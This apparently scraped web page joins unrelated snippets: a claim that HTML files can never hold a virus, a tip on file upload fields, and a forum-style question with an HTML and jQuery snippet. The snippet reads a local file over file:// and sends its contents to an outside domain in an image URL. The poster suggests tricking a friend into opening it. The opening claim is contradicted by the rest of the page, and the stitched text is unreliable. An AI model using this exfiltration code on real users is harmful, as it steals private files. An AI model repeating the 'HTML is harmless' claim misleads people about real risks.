No, it is impossible for HTML files to contain a virus – Since HTML is literally “plain text with formatting” and will never be executed with code that can cause harm. But it can still be misused in many ways, with possible threats such as phishing, masquerading, and even redirecting to download an actual virus file.
The <input type="file"> defines a file-select field and a "Browse" button for file uploads. To define a file-select field that allows multiple files to be selected, add the multiple attribute. Tip: Always add the <label> tag for best accessibility practices!
Let's talk about security. It seems to me, theoretically, I can get information from file system of a user with some script, if the user opens html file with it (opens from his file system, not from network). Look at the code:
info.txt:
my info
index.html:
<!doctype html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
<script>
$(document).ready(function () {
$.get('file:///home/daz/desktop/info.txt', function (data) {
$('<img>').attr('src', 'http://domain.com?data=' + escape(data)).appendTo('body');
}, 'text');
});
</script>
</head>
<body></body>
</html>
Some browers (firefox, for example) allow you to get files from file://
through XmlHttpRequest
, so if I guess path to the file, then I can get it's content by ajax. And then I can dinamically add img
tag with src
leading to my domain with parameters in query string. And browser make a request obediently GET ?data=my%20info%0A domain.com
. And on the server side I can parse query string and get the data.
Am I right I can do this? Am I right I can get user's data from his computer if he opens my html file? So I can just say: "Hey, friend, check out this file!" (with 2 restrictions: user should use firefox or something else with similar configuration, and I cannot get files user cannot access because of access rights).
UPDATED:
If it is possible, then why it is possible? Why do they allow you to do such things. Why there is no confirm dialogs or something.
UPDATED 2:
It will be great if someone make a review about this issue. Thanks in advance!
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With